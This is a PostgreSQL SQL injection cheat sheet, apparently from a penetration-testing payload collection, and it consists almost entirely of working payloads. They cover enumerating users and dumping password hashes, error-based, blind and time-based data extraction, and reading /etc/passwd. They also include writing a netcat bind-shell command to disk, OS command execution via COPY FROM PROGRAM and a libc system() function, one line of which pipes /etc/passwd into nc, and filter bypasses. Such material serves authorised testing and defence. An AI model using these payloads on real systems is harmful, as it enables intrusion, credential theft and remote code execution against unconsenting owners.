# PostgreSQL Injection > ## Summary * [PostgreSQL Comments](#postgresql-comments) * [PostgreSQL Version](#postgresql-version) * [PostgreSQL Current User](#postgresql-current-user) * [PostgreSQL List Users](#postgresql-list-users) * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) * [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts) * [PostgreSQL List Privileges](#postgresql-list-privileges) * [PostgreSQL Check if Current User is Superuser](#postgresql-check-if-current-user-is-superuser) * [PostgreSQL database name](#postgresql-database-name) * [PoStgresql List Databases](#postgresql-list-database) * [PostgreSQL List Tables](#postgresql-list-tables) * [PostgreSQL List Columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) * [PostgreSQL Stacked Query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command Execution](#postgresql-command-execution) * [CVE-2019–9193](#cve-20199193) * [Using libc.so.6](#using-libcso6) * [Bypass Filter](#bypass-filter) * [References](#references) ## PostgreSQL Comments ```sql -- /**/ ``` ## PostgreSQL Version ```sql SELECT version() ``` ## PostgreSQL Current User ```sql SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROM pg_user; SELECT getpgusername(); ``` ## PostgreSQL List Users ```sql SELECT usename FROM pg_user ``` ## PostgreSQL List Password Hashes ```sql SELECT usename, passwd FROM pg_shadow ``` ## PostgreSQL List Database Administrator Accounts ```sql SELECT usename FROM pg_user WHERE usesuper IS TRUE ``` ## PostgreSQL List Privileges Gather information from the [`pg_user`](https://www.postgresql.org/docs/current/view-pg-user.html) table: ```sql SELECT * FROM pg_user ``` Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`: ```sql SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema'); ``` ## PostgreSQL Check if Current User is Superuser ```sql SHOW is_superuser; SELECT current_setting('is_superuser'); SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; ``` ## PostgreSQL Database Name ```sql SELECT current_database() ``` ## PostgreSQL List Database ```sql SELECT datname FROM pg_database ``` ## PostgreSQL List Tables ```sql SELECT table_name FROM information_schema.tables ``` ## PostgreSQL List Columns ```sql SELECT column_name FROM information_schema.columns WHERE table_name='data_table' ``` ## PostgreSQL Error Based ```sql ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) ' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1 ' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1 ' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1 ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` ## PostgreSQL XML Helpers ```sql select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row ``` The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result. ```sql select database_to_xml(true,true,''); -- dump the current database to XML select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema ``` Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. ## PostgreSQL Blind ```sql ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK ' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO ``` ## PostgreSQL Time Based #### Identify Time Based ```sql select 1 from pg_sleep(5) ;(select 1 from pg_sleep(5)) ||(select 1 from pg_sleep(5)) ``` #### Database Dump Time Based ```sql select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1 ``` #### Table Dump Time Based ```sql select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1 ``` #### Columns Dump Time Based ```sql select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1 select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1 ``` ```sql AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` ## PostgreSQL Stacked Query Use a semi-colon "`;`" to add another query ```sql http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- ``` ## PostgreSQL File Read ```sql select pg_ls_dir('./'); select pg_read_file('PG_VERSION', 0, 200); ``` NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group. ```sql CREATE TABLE temp(t TEXT); COPY temp FROM '/etc/passwd'; SELECT * FROM temp limit 1 offset 0; ``` ```sql SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID SELECT lo_get(16420); -- use the OID returned from the above SELECT * from pg_largeobject; -- or just get all the large objects and their data ``` ## PostgreSQL File Write ```sql CREATE TABLE pentestlab (t TEXT); INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash'); SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` Or as one line: ```sql COPY (SELECT 'nc -lvvp 2346 -e /bin/bash') TO '/tmp/pentestlab'; ``` ```sql SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20 SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport ``` ## PostgreSQL Command Execution ### CVE-2019–9193 Can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. ```SQL DROP TABLE IF EXISTS cmd_exec; -- [Optional] Drop the table you want to use if it already exists CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output COPY cmd_exec FROM PROGRAM 'id'; -- Run the system command via the COPY FROM PROGRAM function SELECT * FROM cmd_exec; -- [Optional] View the results DROP TABLE IF EXISTS cmd_exec; -- [Optional] Remove the table ``` ![https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png](https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png) ### Using libc.so.6 ```sql CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; SELECT system('cat /etc/passwd | nc '); ``` ### Bypass Filter #### Quotes Using CHR ```sql SELECT CHR(65)||CHR(66)||CHR(67); ``` Using Dollar-signs ( >= version 8 PostgreSQL) ```sql SELECT $$This is a string$$ SELECT $TAG$This is another string$TAG$ ``` ## References - [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) - [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf) - [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) - [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) - [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) - [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803) - [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)